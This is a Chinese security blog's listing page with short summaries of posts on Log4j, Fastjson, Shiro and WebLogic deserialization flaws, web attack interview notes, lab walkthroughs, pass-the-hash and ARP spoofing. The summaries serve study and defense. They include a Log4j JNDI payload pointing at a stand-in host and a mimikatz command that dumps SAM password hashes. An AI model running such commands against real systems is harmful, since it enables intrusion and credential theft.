- 博客(31)
- 收藏
- 关注
原创 WebLogic 作用,以及漏洞原理,流量特征与防御
WebLogic作为企业级Java应用服务器,提供应用部署、事务管理、集群负载等核心功能,广泛应用于金融、电信等关键领域。该服务器存在T3/IIOP反序列化、未授权访问等高危漏洞,攻击者可实现远程代码执行、服务器控制(删库/后门)、数据窃取、挖矿及内网渗透等危害。典型攻击流量具有特定协议特征。防御建议包括:禁用高危协议、及时补丁更新、配置WAF、加强流量监控和实施最小权限原则,以保障系统安全。
2025-07-10 10:20:49
492
原创 护网hw面试
摘要:本文总结了10种常见的网络攻击手段及防御方法,包括SQL注入(联合查询、时间盲注、报错注入)、XSS跨站脚本攻击(反射型、存储型、DOM型)、CSRF跨站请求伪造、SSRF服务器请求伪造、XXE外部实体注入、文件包含漏洞、文件上传漏洞、权限提升技术(MySQL、Serv-U等提权)、反序列化漏洞(Shiro、WebLogic等组件),以及Windows/Linux应急响应流程(账号检查、日志分析、进程排查等)。针对每种攻击提供了典型利用方式和防范措施,并介绍了常见安全设备的识别特征和应急响应工具的使用
2025-07-09 10:36:40
468
原创 fastjosn漏洞
Fastjson是Java高性能JSON解析库。其漏洞源于未过滤@type字段,攻击者可注入恶意类(如com.sun.rowset)执行RCE攻击。攻击特征包括不完整JSON响应、DNSLog探测及JNDI/RMI外连。危害包括服务器接管、数据泄露、内网渗透及DoS攻击。防御建议:升级最新版本、配置类白名单、限制可信类解析,并通过WAF拦截含@type/JNDI/RMI的恶意请求。
2025-07-09 10:31:55
234
原创 log4j漏洞
Log4j漏洞利用其Lookup功能,通过恶意构造的日志信息(如${jndi:ldap://evil.com})实现远程代码执行,导致服务器被控制、数据泄露等风险。正常功能如${date}显示日志无害,但攻击者可借此下载木马。防御措施包括:隔离网络封禁可疑协议、参数化日志查询、WAF拦截jndi变种请求等。该漏洞危害严重,需及时修补并加强日志输入验证。
2025-07-09 10:31:05
162
原创 shiro反序列化漏洞
ApacheShiro是一个易用的Java安全框架,用于认证、授权和会话管理。其反序列化漏洞(如shiro550和shiro721)利用rememberMe功能伪造cookie进行攻击,流量特征为携带超长Base64编码的rememberMe字段。攻击可导致远程控制、数据泄露和内网渗透。防御措施包括升级版本、使用随机密钥、限制IP访问频率及部署WAF。
2025-07-09 10:30:09
272
原创 pikachu Fileinclusion(local)
windows系统肯定有的文件是C:\Windows\win.ini,用这个来尝试有没有文件包含漏洞。结合报错信息中泄露的fi_local.php文件位置,可以算出相对路径为C:/../../../..发现文件名确实是file1.php~file5.php。/windows/win.ini,代入url。那么会不会还有别的burp抓包选中数字。678异常还有个100也是。但是通过这我们可以得到路径。发现url上数字会变。设置6-100的爆破。
2024-07-24 16:51:24
446
原创 pikauchu之Unsafe Fileupload(不安全的文件上传)
pikauchu之Unsafe Fileupload(不安全的文件上传)
2024-07-24 10:54:03
759
原创 如何理解李彦宏说的“不要卷模型,要卷应用”
李彦宏认为,AI技术已经从辨别式转向了生成式,但技术本身并不是目的,真正的价值在于如何将这些技术应用于实际场景,解决实际问题。称AI时代的规律可能不同于移动时代,一个“超级能干”的应用即使DAU不高,只要能为产业带来实质性的增益,其价值就远超传统的移动互联网。未来的AI发展应该更加注重应用层面的创新,推动技术与产业的深度融合。通过开发定制化的个性化应用,我们可以更好地满足不同用户和行业的需求,充分释放AI的潜力。在追求技术突破的同时,我们也要注重如何将这些技术更好地应用于实际,创造更多的社会和经济价值。
2024-07-10 10:05:02
298
原创 《渗透测试技术》大作业
虚拟机WIN7,WinServer2008,kali。Ok,成功拿下win2008域控。4.尝试是否可以访问域控根目录。二、 实验设备及环境。可以访问,说明写入成功。下载镜像并创建虚拟机。5.利用工具尝试利用。
2024-07-01 11:14:24
328
原创 哈希传递攻击
mimikatz.exe "privilege::debug" "lsadump::sam /sam:sam.hiv /system:system.hiv" "exit" > hash.txt (命令行执行方式)命令如下,远程访问存放在kali上的脚本并执行,分别将sam和system两个文件保存在WIN7 c:\ 根目录下。lsadump::sam /sam:sam.hiv /system:system.hiv,即可获取到所有用户信息。2,使用工具读取win7的本地账号和对应的NTLM hash值。
2024-07-01 11:02:28
1458
原创 ARP欺骗
首先,打开Kali Linux终端,执行以下命令以安装必要的工具:安装arpspoof(在ettercap-graphical中已包含):安装driftnet:安装完成后,确认网络接口名称,使用ifconfig命令查看。
2024-07-01 11:00:53
1297
原创 红蓝对抗网址
https://www.reddit.com/r/Python/comments/a81mg3/the_entire_mit_intro_computer_science_class_using/ 麻省理工机器学习视频。https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ sql注入sheet表。
2024-04-23 17:27:36
690
原创 xss靶场1-10关
然而,有个坏人在你的便条里偷偷藏了一个小精灵,这个小精灵会在其他人看到你的便条时,突然飞出来,搞破坏,比如将别人的购物车里的商品都换成了垃圾,或者指向了一家不怎么好的商店,让大家误以为那是特价商品的地方。因为很多时候输入内容是有长度限制的,真正的XSS攻击并不是一段毫无意义的弹窗代码,弹窗是为了验证漏洞的是否存在。4. **自我驱动和持续学习意识的养成:** 网络安全领域是一个不断演进和变化的领域,学习XSS攻击只是开始,更重要的是持续学习和不断跟进新的安全技术和趋势,这培养了我自我驱动的学习意识。
2024-03-15 20:28:26
1263
1
原创 网安工具 收集
工具慢慢收集!需要自取!所有工具仅能在取得足够合法授权的企业安全建设中使用,在使用所有工具过程中,您应确保自己所有行为符合当地的法律法规。 如您在使用所有工具的过程中存在任何非法行为,您将自行承担所有后果,所有工具所有开发者和所有贡献者不承担任何法律及连带责任。 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用以下所有工具。 您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。重点提醒:本项目工具来源于互联网,是否含带木马及
2024-03-15 20:11:13
2300
1
原创 DedeCms织梦系统漏洞复现
1 部署好之后发现系统默认管理路径是dede,登陆管理后台可以通过地址然后有dedecms安全提示直接打开根目录修改dede文件夹为LYP重新进去管理员后台对数据进行还原看一下网站的地址接着生成新的网站然后即可访问网站,CMS搭建完毕首先打开后台管理页面开启会员功能这样就可以注册一个账户。
2024-03-13 21:23:03
3383
第二章进程的描述与控制.xmind
2024-07-29
一.操作系统引论.xmind
2024-07-27
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅